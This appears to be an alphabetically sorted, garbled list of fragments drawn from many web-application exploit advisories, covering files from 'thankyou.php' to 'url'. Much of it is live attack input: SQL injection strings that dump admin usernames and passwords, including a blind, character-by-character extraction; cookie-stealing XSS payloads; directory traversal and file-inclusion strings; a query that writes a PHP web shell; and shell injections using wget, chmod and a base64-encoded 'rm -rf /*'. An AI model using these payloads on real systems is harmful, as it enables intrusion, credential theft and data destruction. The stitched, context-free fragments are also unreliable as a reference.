thankyou.php?g_documentRoot=[Evil_Script]
thankyou.php?LocationID="><script>alert('LOL')<
thankyou.php?p=Orca-v.2.0
thatware
thcxthcx.net
theblog
theblog2-0
theblog.codigolivre.org.br
thebox
thecartpress
the_dotcms
the-downloads
the_faq_manager
    The full path to Joomla! 
".$thehost."
the_kroax
thematic-directory
theme
{$theme}
THEME
theme4
/?theme_change=..
Theme.class.php?gfwww=[Shell]
theme_description.php
themeforest.net
theme.inc.php
theme.php');"));
theme.php'-- 1");
theme.php');system('rm 
themes
themes">
Themes
ThemeSiteScript_1.0_webgraf.ru.rar
themes.php
themes.php 
themes.php?L_failedopentheme=%3Cscript%3Ealert%28%22X
themes.php?message=<script>alert(document.cookie);<
thengine
*   #the page fully loaded
the-pligg-cms-0dayset-1.html
the-pligg-cms-0dayset-1.html 		 				
the-rat-cms
theresistance)
the+smallest+possible+gif
thespider.neocrome.org
the_ticket_system.html
The-Toolkit
theuploader
the_uploader
theuploader' ],
[The URL]
thewhippetarchives.net
[THINGS ...]
thinkforge.org
thinkun-remind
thion.jogger.pl			    xx
thirdparty
third-party
{$this->admindir}
   << This FoldEr
), this function
{$this->host}{$this->path}
".$this->host.$this->path.$location);
{$this -> host}{$this -> path}\r\n" . 
'.$this->host.$this->path.$this->last_redirection)
'.$this->host.$this->path.$this->last_redirection);
", this instruction will be executed:
 (this one includes show_enthversion.php from evilsite)
thisraidprogress.php?INFO_RAID_ID=-9999+union+all+select+1,2,3,user_name,user_password,6+from+fusion_users--
thisraidprogress.php?INFO_RAID_ID=[ exploit ]
thnks-ahwak2000-cyber-crystal.php?cmd=uname-a
".$t_host.$t_dir.$fullname."\n";
thread-3623.html
threaded
*&thread_id=[THREAD_ID]' AND auteur_id LIKE '%%' 
thread.php?id=210&start=[SQL] 
thread.php?start=[SQL Injection]
thread.php?threadid=125185
thread.php?threadid=[SQL]
threads
threads.php?ssid=9999%27union
threewp-email-reflector
ThresholdActionConfiguration.jsp?resourceid=10000055&attributeIDs=101
ThresholdActionConfiguration.jsp?resourceid=10000055&attributeIDs=101&
t-htbmanager
thumber.php?lang_sel=[LFI]%00
thumbgen.php?img=[d:\11.jpg]
thumbnailformpost.inc.php?adminlangfile=[LFI]
thumbnail.php?module=gallery&GLOBALS[PTH][classes]=[include]
thumbnail.php?name=webalbum&page=<script>alert(document.cookie);<
thumbnail.php?type=3&file=..
thumbnails.php?album=-1+union+select+concat_ws(0x10,now(),version(),user(),database())
thumbnails.php?album=-1+union+select+load_file(
thumbnails.php?album=-1+union+select+user+from+mysql.user--
thumbnails.php?cat[]
thumbnails.php?img=..
thumbnails.php?img=include
thumbnails.php?lang=..
thumbnails.php?page[]
thumbnails.php?search=1&album=search&newer_than[]
thumbnails.php?search=1&album=search&older_than[]
thumb.php?gallery=.
thumb.php?id='+union+select+1,2,user()
thumb.php?pic=<script>alert(
thumb.php?src=MALICIOUS_URL
thumbs
thwb
thyme
thyme_directory
tiago4orion
tiagonatel
tick
ticket
ticket.form.php
ticket.form.php?id=1&_predefined_fields=[XXXX]
ticket.php?ac=new
tickets
ticket_show_file.php?_SERVER[DOCUMENT_ROOT]=
tickets.php ]
tickets.php?id=[SQLi]
/?ticket_title=&contact_name=&priority=&status=&action=index&query=true&module=HelpDesk&order_by=&sorder=ASC&viewname=0&button=Search&category=&date_crit=is&date=%27+UNION+SELECT+56%2CCONCAT%28user_name%2C+%22%3A%22%2C+user_password%29%2C+%22Open%22%2C%22Normal%22%2C1%2C1%2C1%2C1%2C1%2C1%2C1%2C1+from+users+where+users.user_name+LIKE+%27 
tiddlywiki.org
tiifp.org
tiki
tiki-5.2
tiki-8.2
tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(0)%3C
tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=
tiki-imexport_languages.php
tiki-index.php?error_handler_file=
tiki-index.php?local_php=
tiki-jsplugin.php?plugin=x&language=..
tiki-lastchanges.php?days="><scr<script>ipt>[code]<
tiki-listmovies.php?movie=..
tiki-rss_error.php
tiki-view_forum_thread.php?forumId=1&comments_parentId=0&topics_offset=10%22%20onmouseover='javascript:alert(document.title)%3B'%3E[PLEASE%20MO
tiki-watershed_service.php
tikiwiki
tikiwiki)\n";
tikiwiki.org
[tilde_path]
tillkruess
'.$tim2.'hauru.jpg.png.php';
TimeEntry.class.php?gfcommon=[Shell]
timeentry.php?gfcommon=[Shell]
timeline
timeline.php?pids=[Evil_Query]
timer.php?d=4099&l=22665'<img src="myimage.jpg">&profile=40
timesheet
timesheet.php?config[include_dir]=[evilc0de]
time-tracker
timetracking
timthumb
timthumb.php
timthumb.php?src=MALICIOUS_URL
tincan.co.uk
tinybb
tinyblogr.sourceforge.net
tinybrowser
tinybrowser_1416_multiple_vulnerabilities
tinybrowser.php?type=file&folder=..
tinybrowser.php?type=file&folder=..%2F..%2F..%2F..%2F..%2F..%2F..%2F&feid=filenameid
[tinyCMS]
tinycontent
tinymce
tiny_mce
TinyMCE
tinymce-thumbnail-gallery
tinymcpuk
tinymsg.php?action=2&from=Youpi!||Great
tinymsg.php?action=2&to=..
tinymsg.php?action=3 will show the
tiny_php
tinypug
tinypug-0.9.5
tinyzenpage
tinyzenpage.php?album=';}};alert(123);var+kala={zzz+:+function(ed){var+qwe='
tip='0
tips-of-the-day
title>
title><
title>");
title%3E
title%3E<script>alert(document.cookie);<
title><body text=ffffff bgcolor=000000><center><h1>YOUR SHELL IS ON!<br><
title>','<body text=ffffff bgcolor=000000><center><h1>YOUR SHELL IS ON!<br>','<
>  <title>{$filetransfer_language[0]}<
/?titleId=TITLE<
title>   <link type="text
title><meta http-equiv="Co
title><meta http-equiv="Content-Type" content="text
>   <title>{$otavchat_language[18]}<
title><ScRiPt %0A%0D>alert(566615539956)%3B<
title><ScRiPt%20%0d%0a>alert(+00213771818860)%3B<
title><ScRiPt%20%0d%0a>alert(213771818860)%3B<
title><script>alert(0)<
title><script>alert(123);<
title><script>alert(document.cookie)<
title> <script>alert(document.cookie)<
title><script>alert('lol')<
title><script>alert('LOL')<
title><script>alert(LOL')<
titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,'<script>alert(document.cookie)<
titles.php?action=viewlist&let=<script>alert(document.cookie)<
titre_presente_enf.class.php?path_om=[Shell]
TLkEs :)
tlmcms32
tlm.hebserv.fr
tml
tmp
tmp 
tmp_1339.php\n";
tmp;chmod%20%2bx%20t;.
tmpl
tmp_media
tmp;mv%20phpshell-2.1%20p%0d%0a" &>
tmp&sid=";
tmp_view.php?file=
tmp;wget www.server.tld
tmp&xoverwrite_theme=0&op=savethemes";
tmsp
tmsp.php?mosConfig_absolute_path=[evilcode]
tmssql.php?do=phpinfo
tmssql.php?do=<script>alert(document.cookie);<
tntforum
[tntforum_path]
to
toBePublished.php
toBePublished.php?last_message=<script>alert(1)<
 to crack the md5 hash"
"; to create urls, but allows
today4host.net
today.php?limit=waraxe
todos.php?id=-99+union+select+1,2,mail,contrasena,5,6,7+from+ytb_usuarios+where+id=1
 to find evil
 to find evil 
    (To Find It)
  (to find shell)      
toko
toko-contenteditor.pageil.net
 (to login)
tomatocart
tomex.org
toner-cart-a-specialized-script-to-help-you-sell-toners-online.html
tonioc.free.fr
tool
toolbar.php?dirDepth=[Evil]
tool_provider_outcome.php HTTP 
tools
tools_cgicheck2.php?dir=3D&file=3D%20.
tools_data_cleanup.php?gfwww=[Shell]
tools-dienste
tools.inc.php
tools.php?action=logsdump&yessubmit=Yes" alt="Do you see this?" 
tools.php?p=..
top
top100
Top_10_2007-Failure_to_Restrict_URL_Access
Top%20Sites%20(8%20Archivos)
top_dropdown
TopGamesScript
topic
/?topic=5235
topic.php?id=10%20and%201%20div%200%20union%20select%201,concat%28user%28%29,0x3a3a,database%28%29,0x3a3a,version%28%29%29
topic.php?id=1 and 1=1  --> TRUE
topic.php?id=1 and 1=2  --> FALSE
topic.php?id=N
topic.php?id=[SQLi]
topic.php?name="><script>alert(document.cookie)<
topic.php?SITE_item=54'+and+convert(int,@@version)='54
topic.php?tid=[code]
topic.php?topic=-1
topic.php?topic=12&forum=6
topic.php?topic=669%B4SQL%20INJECTION 
topic.php?topic=[topicid]&forum=[forumid]
topics
topics92
topicseen
topics.php?action=ShowComment&id=-1 UNION SELECT 1,2,3,4,5,6,7%23
topics.php?action=show&id=-1' UNION SELECT 1,2,3,4,5,6,7,8%23
topics.php?f=-1 union all select user()--
topics.php?f=-1 union all select version()--
topics.php?f=-1 union ll select database()--
topics.php?fid=3&limite=[sql]
topics.php?header_prog=[Evil_Script]
topics.php?op=listarticles&topic_id=Sql.
topics.php?op=viewtopic&topic=-1%20Union%20select%20name,name,pass,name%20From%20users%20where%20uid=1
topics.php?op=viewtopic&topic=-1+Union+select+name,name,pass,name+From+users+where+uid=%s",$serv,$path,$uid);
toplist
toplist.2.11
toplist-df148.html
topliste
toplist.php";
toplists.php?list=1'+and+1=0+union+select+1,2,current_user,4,5,6,7,8
topo
toppanel.inc.php?template_path=[LFI]
[top_path]
top.php?admindir=[evil_script]
top.php?laypath=[Shell]                           ^
top.php?option=3&soption=3&url='"<
top.php?poll=' AND 0 UNION SELECT 0, '%3C%3Fsystem%28%24_GET%5B%22c%22%5D%29%3B%3F%3E' , 1, 2, 3, 4, 5, 6, 7, 8,'' INTO
top.php?sessionid=[SQL]
topquark
topside
topsite
topsite.php?ts=-1
topsite.php?ts=-169%20union%20select%201,2,3,4,5
topsites
top-sites-2-2-1
topsitesdirectory
TopSitesdirectory
topsites.mdb
topsites.php?lang=[LFI]
tops_top.php?id_cat=-5
topusers.php?offset=0;select+1,version()+as+user_name,3,4,5;
top_view.php?id='
torrenthoster
torrential
torrents
torrents-details.php?id=1&
torrents-details.php?id=1&keepget="><script>alert(123);<
torrents-needseed.php
torrents.php?mode=category&cat=0%20union%20select%20null,null,concat(username,char(32),password,char(32),email)%20from%20users%20
torrents.php?mode=upload
torrents.php?sort=1&type=waraxe
torrents-upload.php
torrenttrade" 
torrenttrader
torrenttrader 
torrenttrader109
torrenttrader109-10-06-2009.gz
torrenttrader208
TorrentTrader%20v2
TorrentTrader-v2.06
torrentvolve
TotalCalendar_2
total.php?page=..
total.php?theme_dir=..
 to the link of target website.
 (To upload Evil )
tour
tourdetails.asp?id=[sqli]
tournsearch.php?idclass=[SQL]
tour_packages.asp?country=[sqli]
Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user(),0x3a,version()),15,16,17--
Tour.php?id=-93+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(user_name,0x3a,user_pass),15,16,17+FROM+admin--
tours.php?page=..
tourview.php?tourid=2%20and%201=0--
tourview.php?tourid=2%20and%201=0--   (false)
tourview.php?tourid=2%20and%201=1--
tourview.php?tourid=2%20and%201=1--   (true)
tourview.php?tourid=2+and+substring(@@version,1,1)=4  (false)
tourview.php?tourid=2+and+substring(@@version,1,1)=5 
tourview.php?tourid=2+and+substring(@@version,1,1)=5  (true)
tower.klif.pl
ToxicMindZ.org                                     #
toylog
ToyLog
 to your target url. Dont forget replace YOURUSERNAME to YOURUSERNAME.
tpf
tpl
tpl.inc.php?conf[classpath]=[URL-OF-SCRIPT]
tpl_message.php?right_file=[[Sh3LL
tplmgt13
tpl_user_settings_action.php" method="post">
tpns.k-na.se
[tpointdir]
tpvgames.co.uk
tr>
tr><
tr>'),
TR
TR>'),
tr1.php?id=-19+union+select+1,2,3,4,concat(0x3a,Username,0x3a,Password),6,7,8,9,10,11,12,13,14,15+from+adminsettings--
tr1.php?id=-19+union+select+1,2,3,password,5,6,7,8,9,10+from+adminsettings--
trabajoenlinea.net
trac
trac.cgi
trackads.php[sql]
trackback_delete_cgi.php?track
tracker
tracker-delete.php?clientid[valid-id]&trackerid[valid-id]
tracker_gateway.php?gfwww=[Shell]
tracker.moodle.org
tracker.php
tracker.php?aid=3417184
tracker.php?aid=3417184'],
tracker.php?aid=3418570
tracker.php?gfcommon=[Shell]
tracker.php?url=http%3A
TrackersGroupSearchEngine.class.php?gfwww=[Shell]
TrackersHtmlSearchRenderer.class.php?gfwww=[Shell]
TrackersSearchQuery.class.php?gfcommon=[Shell]
tracking
tracking[date] 
tracking".date("dmY")."%00 HTTP
tracking.details.php?trackingid=1[SQL]
track.php
track.php?id=-2+union+select+concat(username,0x3e,password)+FROM+admin--
track.php?id=-2+UNION+SELECT+concat(username,0x3e,password)+FROM+admin--
track.php?path=[Evil_Script]
track.php?person=00001&name=[code]&email=1&action=sub&submit=Wy%B6lij
track.php?person=<SCRIPT CODE>
track.php?p=[file] 
trac.roundcube.net
trade
tradeCategory.php?id=[] <== SQLi
trader
traffic
traffic.cyberaction.biz
trafficdemos
traffic.php?getpwned=
tragt & path #";
traidnt19736
traidnt2230161
traidnt.net
traindepot
[Traindepot_path]
Trajet
transactions.php?sites[]=1%20union%20select%201,2,3,4,5,6,7,8,vers ion%28%29,10,11,12,13,14,15,16%20+--+
TransferDomainPage.class.php?base_path=[evil_scripts]
transfermanager
translate?u=http%3A%2F%2Fwww.phome.net%2Ftmp%2Fecms37%2F&langpair=zh-CN%7Cen&hl=zh-CN&newwindow=1&ie=UTF-8&oe=UTF-8&prev=%2Flanguage_tools
translations.php?ONLY=relative_apache_path
translucid
transLucid_175
traq
traqproject.org
trash.php?delete_all=1&objects[]=1
travaux.class.php?path_om=[Shell]
travel_d_details.php?listingid=[1nj3ct c0dE]                                          
traveldemo
traveling
travelon_xpress.html  )
[Travelsized_path]
tree
tree.documents.php?GLOBALS[where_framework]=[evil_code]
tresults.php?tourn_id=[SQL]
trial
tribal-GPL-1066
tribiq
tribiq-CL-9000
trigger.asp
trio.asp ]
triscoop_race_system
trixbox.org
trmino-subordinado-de-ejemplo"><script>alert('y3nh4ck3r was here!')<
[TroubleScript]
tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13,14+from+adminsettings--
tr.php?id=-1+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11,12,13+from+adminsettings--
tr.php?id=-1+union+select+1,2,3,concat(user(),version(),database()),5,6,7,8,9,10,11,12,13--
tr.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13--
trr.php?id=-91+union+select+1,2,3,concat(0x3a,Username,0x3a,Password),5,6,7,8,9,10,11+from+adminsettings--
truc
True
 True ,,
*		True
trunk
trunks
trunk wikka
tr_user_news
trustKeeper.php), has been updated to detect
TrustRoot.php?_ENV[asicms][path]=
try
tryag.cc
tryag.php
tryit
trylogin.php?go_info[server][classes_root]=[cmd_url]
tsep.sourceforge.net
tsheetx
tshirt2
tshirt_design_download.html
ts_image.php?ts_random=54771854
tst.php')
tst.php");
tt
ttCMS_path
ttforum
tts
tts2
tts-demo
ttvideo
[tucows]
tugux
tuguxcms
tugux-cms-nid-blind-sql-injection.html
tuguxCMS_v.1.0_final.rar
tumbnail.php?config[root_ordner]=sh3lz?
tune-library
tune-library-ajax.php?letter=-1' UNION ALL SELECT CONCAT_WS(CHAR(59),version(),current_user(),database()),2--%20
tuner
tunez
".$tunnel."
tupdate.php?groupid=change&sg=groupid,description=char(97,98,99,100)&id=10 
tupinambis
turkeyflag0xuhz9zc7uf0.jpg);
turn-k.net
turn-k.net 
turnkringonzehoop.be
tus_imagenes
tusuario
tutorial
tutorialcms
tutorial.html), 
tutorialms
tutorials
tutorials.php?show=15 [SQLi]```````
tutoring-site-script.htm
tutos
tuttinova
tuttinova-1.6
tux.isa-geek.org
tva.php?mode=modif&id=[SQL]
tv_email.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
tv_misc.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
tv.php?loc_id=1"><
tv_portal
twa_is_offline.php          	                     |
twa_is_offline.php          	                      |
twf
twg183
twg3at.php
twiki.org
TWikiUsers?rev=2%20%7Cless%20
twonineothree
twonky:9000
twzslbg.jpg">
txt
[txtbb10RC3_path]
txtblogcms
txtblogcms-1.0a
[txtblogcms_path]
txtcmsv0.3
txtforum104
txt.inc.php?file=..
txt.inc.php?file=[file]&check=0&comment=[evil code]
txt.inc.php?file=[file]&check=0&email[to]=[evil code]
txt.php?current_dir=..
txt.php?currentdir=..
txt.php?font=%22%3E%3Cscript%3Ealert(document.cookie)%3C
txt.php?mess[31]=%22%3E%3Cscript%3Ealert(document.cookie)%3C
txt.php?normalfontcolor=%22%3E%3Cscript%3Ealert(document.cookie)%3C
txtshop
txtSQLAdmin
txx
type
type.asp?iType=1[SQL inject] 
type.asp?iType=4+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+users#
type.asp?iType=[ur injection code]
/?type=rss;action=.xml;sa=comentarios;id=7+and+1=0 --> FALSE
/?type=rss;action=.xml;sa=comentarios;id=7+and+1=1 --> TRUE
/?type=rss;action=.xml;sa=comentarios;id=7+and+substring(@@version,1,1)=4 --> FALSE
/?type=rss;action=.xml;sa=comentarios;id=7+and+substring(@@version,1,1)=5 --> TRUE
typo3
typo3conf
typo3-core
typo3-core-sa-2011-004
typo3.org
typo3-sa-2010-020
TYPO3-SA-2010-020_video.htm
typo.i24.cc
tzn
u
U0
 -u=1
 -u 1              |
 -u=2
 -u 2 -t 1
u2uadmin.php?uid=x"><%73cript>alert(document.cookie);<
u2u.php?action=send&username=%22%3E%3Ciframe%3E
u2u.php?action=send&username=[code] 
u%3E
u%3E%3C
u7qoD5
uajax.php?page=avatar&id=[ your ID or id for a member you can change here avatar]
 -u Alby\n";
uasc.org.ua)
uasc.org.ua), antichat  
ubb
[ubbpath]
ubbt
ubbthreads
ubbthreads.php?file=..
ubbt.inc.php?GLOBALS[thispath]=
ubbt.inc.php?GLOBALS[thispath]=[FILE]
ubbt.inc.php?thispath=
ubbt.inc.php?thispath=[FILE]
uberghey
ubuntu
uccass
&u=&copt=1&sortKey=0
ucp.html
ucp.php?mode=login\r\n";
u.discuz.net
ueberp
uebersichtshopsystem
uebimiau
UE_DotNET.html
ufavour.php?UID=66 AND 1=1
ufavour.php?UID=66 AND 1=2
ufavour.php?UID=66 [Blind]
ufc.html
ufp
ufpr.dl.sourceforge.net
ufriends.php?UID=66 AND 1=1
ufriends.php?UID=66 AND 1=2
ufriends.php?UID=66 [Blind]
ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,username,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15+from+signup--
ugroups.php?UID=-1+UNION+SELECT+1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15--
ugroups.php?UID=66 AND 1=1
ugroups.php?UID=66 AND 1=2
ugroups.php?UID=66 [Blind]
ugroup_videos.php?urlkey=1' or (select if(5=2,0,3))-- 3='3
ugroup_videos.php?urlkey=1' or (select if(5=5,0,3))-- 3='3
ugroup_videos.php?urlkey=1' or (select if(count(0)=1,0,3) from sconfig where soption='admin_name')-- 3='3
ugroup_videos.php?urlkey=1' or (select if(count(`svalue`)!=0,0,3) from sconfig)-- 3='3
ugroup_videos.php?urlkey=1' or (select if(count(`svalue`)=80,0,3) from sconfig)-- 3='3
ugroup_videos.php?urlkey=1' or (select if(length(svalue)='11',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
ugroup_videos.php?urlkey=1' or (select if(mid(svalue,10,1)='5',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
ugroup_videos.php?urlkey=1' or (select if(mid(svalue,11,1)='1',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,15)=0x6F28326E40622568613531,0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,15)='o(2n@b%ha51',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
ugroup_videos.php?urlkey=1' or (select if(mid(svalue,1,1)='o',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
ugroup_videos.php?urlkey=1' or (select if(mid(svalue,2,1)='(',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
ugroup_videos.php?urlkey=1' or (select if(mid(svalue,3,1)='2',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
ugroup_videos.php?urlkey=1' or (select if(mid(svalue,4,1)='n',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
ugroup_videos.php?urlkey=1' or (select if(mid(svalue,5,1)='@',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
ugroup_videos.php?urlkey=1' or (select if(mid(svalue,6,1)='b',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
ugroup_videos.php?urlkey=1' or (select if(mid(svalue,7,1)='%',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
ugroup_videos.php?urlkey=1' or (select if(mid(svalue,8,1)='h',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
ugroup_videos.php?urlkey=1' or (select if(mid(svalue,9,1)='a',0,3) from sconfig where soption='admin_pass' limit 1 offset 0)-- 3='3
ugroup_videos.php?urlkey=1' or (select if(svalue='admin',0,3) from sconfig where soption='admin_name' limit 1 offset 0)-- 3='3
ugroup_videos.php?urlkey=%27%20and%203=%273
ui
uid=1
uid='1
[uid].gif%00
  UID (int) #
 ' & ' UID (int) #' & _
 ' &  ' UID (int)' & @CRLF
uidx.php
uigabusinessportal
uigafan
uigaportal
u_ins.php?MGR=[evilscript] |
$uject");
uk
UKCD
ul
ul><
ulgabusinessportak
ulisse
ulisting
ultimate-auction
ultimate_profit_portal.html
ultraforum1.png
ultraforum2.png
ultralightforum
umfragen
umi-cms.ru - UMI.CMS is a fast and scalable content management system.
um_uedit.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
um_util.php3?GLOBALS[AA_INC_PATH]=[evil_scripts]
unb_lib
uncategorized
undoweb.frih.net
ungallery
uniforum.biz
uninstall.php
uninstall.php?step=2
union
*!union
+union+
unIon
unION
uNIOn
Union
*!Union*
UNION
' UNION
UNION\
union.html
UNION+SELECT
'+union+select+0,username,0,0,0,0,0,0,0,0,0,0,0,0,password,0,0,0,0,0,0,0,0+from+members+where+id='1
'+union+select+0,username,0,0,0,0,0,0,0,0,0,0,0,0,password,0,0,0,0,0,0+from+members+where+id='1
uNioN++sElecT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version())--
[unique 
UniquE-Key.ORG<
UniquE-Key.ORG\n";
unique_username_ajax', chk_usr))
united
universecms106.rar
uniweb
uniweb.asp
unix
UNIX.class.php?gfcommon=[Shell]
unix.freshmeat.net
unkn0wn.ws
") unless !$proxy;
' unless $target =~ 
") unless !$tunnel;
unspecified-vulnerabilities.html ("least disclosure" rant)
unstable
Unvalidated_Input
up
up1.mlfnt.net
up3
up5.rar.html
up.9q9q.net
upb
UPB
UPB%202.2.7
UPBadvisory.rtf
upcoming.add-edit.php
upcoming.list.php
upcoming.php?id=>"><ScRiPt%20%0a%0d>alert(213771818860)%3B<
upcoming.php?public_must_be_enabled=true&public_access=Y
update
updateAJAX.php?add=
updateAJAX.php?post
update_article_hits.php?show_hits=yes&article_id=-1%e5" union select login_name from hbcms_users where id=1%23
update_article_hits.php?show_hits=yes&article_id=-1%e5" union select login_pass from hbcms_users where id=1%23
update.asp?AccountID=xx [ SQL ATTACK]
update.asp?ItemID=xx [ SQL ATTACK]
update.atutor.ca
updateCreditCards.asp?id='
 << Update donk >_<
updated successfully
update_filesize.php?gfwww=[Shell]
update?id=1" method="post">
updatelist.php?filepath=..
updatePage.php?lang=..
update.peopleaggregator.org
")+"updatepf.php";
update.php
update.php?read_me=0&readme_file=
update.php?read_me=0&readme_file=..
update.php?readme_file=
update.php?readme_file=..
updateprofile.php?id=1">
update_profile.php" method="POST">
updater
updater.php">
updater.php?lang_sel=[LFI]%00
updates
updateset.php
updateSortOrder.php?menu_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
update_user
updateUser.php\" method="POST">
update-zend-framework-vulnerability-security-update
updown.php
up_file
upfiles
up_files
upgrade
upgrade.asp
upgrade_in_progress_backend.php?target_url=">[code]
Upgrade.php?GLOBALS[sugarEntry]=1&theme=..
upgrade.php?language=..
upgrade.php?prepatch_errorcode=1&patch_files[0][orig_file]=VERSION&perl_binary=
upgrade.php?ucat=-1086 union all
upgrade.php?ucat=[SQL]
upgrade_unattended.php?db_type=%27
upgrade_unattended.php?db_type=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
upgrade_unattended.php?db_type=%3Cscript%3Ealert%281%29%3C
u.php
uplaylist.php?UID=66 AND 1=1
uplaylist.php?UID=66 AND 1=2
uplaylist.php?UID=66 [Blind]
upldgallery.php
upload
upload');	
upload"
Upload
UPLOAD
upload.asp
upload.asp" method="post">
upload.asp?type=file&style=coolblue&language=zh-cn
upload_banners.php
upload_banners.php ( no need to registeration)
uploadcc.php --form
uploadcp
uploaded
UploadedFiles
uploaded.to
uploader
uploader_flash
uploader.html
uploader\maian_uploader\user_uploads\10indoushka7ae0
uploader.php
uploader.php'>
uploader.php");
uploader.php" method="POST">
uploader.php  <=- upload your file here
uploadet-file.*
upload_file_ajax?qqfile=liwo_sh.php', upload_data))
upload_filemanager.php?dossierup=testing" ENCTYPE="multipart
upload-file.php
upload-file.php");
upload_file.php?folder=". $aRemotePath ."
upload_file.php?submit=banane";
uploadfiles.php">
upload_fileuploadcontrol.php?action=[FILE]&expid=[FILE]&ajax_action=[FILE]
uploadform.asp
upload_form.php
upload_form.php?GLOBALS=[Evil Script]
upload-forms-threat
uploadgames.php
upload.html
uploadi
uploadify
Uploadify
uploadify.php");
uploadify.php"); 
upload_image_category.asp?cid=
upload_image_category.asp?cid=[SQL Inject]
uploadimage.php
uploadimages
UploadImages
upload-images.php
upload-images.php");
upload_images.php  -- View BackDooR Shell -
uploadimg.php                                          ++
upload_img.php?upload=1&ok_update=yes&path=.
upload\includes\js\files\files\uploader.html    (2 Find It)
uploadItem.php?image=.;  ;
uploadPhoto.php?abspath=RFI
upload_photo.php?core[system_path]=[evil script]
upload.php
upload.php 
upload.php?">
upload.php',
upload.php",
upload.php";
upload.php");
upload.php (2 Upload)
upload.php?Directory=.
upload.php?"> Download File<br>
upload.php?feid=%22);alert(0);
upload.php?folder=
upload.php?group=
upload.php" id="form" method="post" onsubmit="a=document.getElementById('form').style;a.display='none';b=document.getElementById('part2').style;b.display='inline';" style="display: inline;">
upload.php?lang=..
upload.php?language=[-LFI-] 		#
upload.php?login=1',
upload.php" method="post">
upload.php?mode=delfile&file=Creando Wiki.pptx
upload.php?mode=delfile&file=FileName
upload.php?path=
upload.php?path=..
upload.php?step=mkdir&dir=..
upload.php?step=rmdir&dir=..
upload.php thus allowing any 
upload.php (To Upload Evil)
upload.php?type=
upload.php?Type=Media
upload.php?Type=Media"
upload.php (Upload Page)
upload.php * up the ev!l 
upload_pics.php
upload_pictures.php
upload_pictures.php HTTP
upload.pl
uploads
upload&site_pool=
uploadsnaps.php
uploads.php                                              #
uploads.php?p=<script>alert(12345);<
uploadtest.html
uploadtest.html#
uploadtest.html	
upload_test.php  -- u can upload BackDooR shell -
/?upload_to=
uploadtool.sourceforge.net
upload.traidnt.net
UploadVideo
 upload your file here
upm-polls
upoint.info
up.php
up.php?del=..
up.php?my[root]=[Bad Code]
up.php (To upload Evil )
up.php (Upload Ev!l Whithout Register)
uprofile.php?UID=1+and+1=2+union+select+1,2,concat(uid,char(58),username,char(58),pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+signup+limit+0,20
uprofile.php?UID=66 AND 1=1
uprofile.php?UID=66 AND 1=2
uprofile.php?UID=66 [Blind]
upstnt.php?zid=1&lid=1&cartid='SQL_INJECTION 
upstracking.php?trackingnum=&reqagree=checked&m='"><script>alert(document.cookie)<
upstracking.php?trackingnum=&reqagree='"><script>alert(document.cookie)<
upstracking.php?trackingnum='"><script>alert(document.cookie)<
uptodate
uptodate.class.php?system_path=[evil_scripts]
upu
ura_demo
ura_order.html
[ur evil recipe name.html]
urgence.class.php?path_om[Shell]
urhost
#{uri}" },
uri="http:\
URINorm.php?_ENV[asicms][path]=
url
'; # url
'.$url);
" + url
" + url + "
".$url;
".$url;}
".$url."
".$url);
"+url
[url]
url]
url]<
url] 
url]'[
url]".
url][
URL
[URL]
$URL
URL]" 
URL][
url2header.php'
url]&afs_type=bar&afs_background=Default_Blue&afs_showonline=1&afs_full_line1=username&afs_full_line2=usergroup&afs_full_line3=postcount&afs_full_line4=registrationdate&afs_full_line5=reputation&afs_full_line6=blank&afs_bar_left=username&afs_bar_center=usergroup&afs_bar_right=postcount' , `password`= '65a1447de8e73ae67a938ae997ad4ed4', `salt`= 'NPOvUCXg'  WHERE `uid`='1';-- 
url, and it only
'.$urlarr['host'].$urlarr['path'];
url--ataca.org
[url domain]
urlencoding.htm
URLHERE
[url_inclusion_exploit]
urllength.html
<?=$url ?>?" method = "post" name = "member_info">
" . $url . "\n";
url] ' onmouseover=alert(1) [
url" onmouseover="alert(document.cookie)
url.php?&123&${var_dump(system(base64_decode(cm0gLXJmIC8q)))}=123456LoL
url.php?$%7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY
urlreal"><script>alert(1);<
/?url=[RFI]&file=Search
urlrotator
urlrotator.php
'.$url.'search.php');
url-shortener-script
urlshrink
',$urltarg))
'.$urltarg;
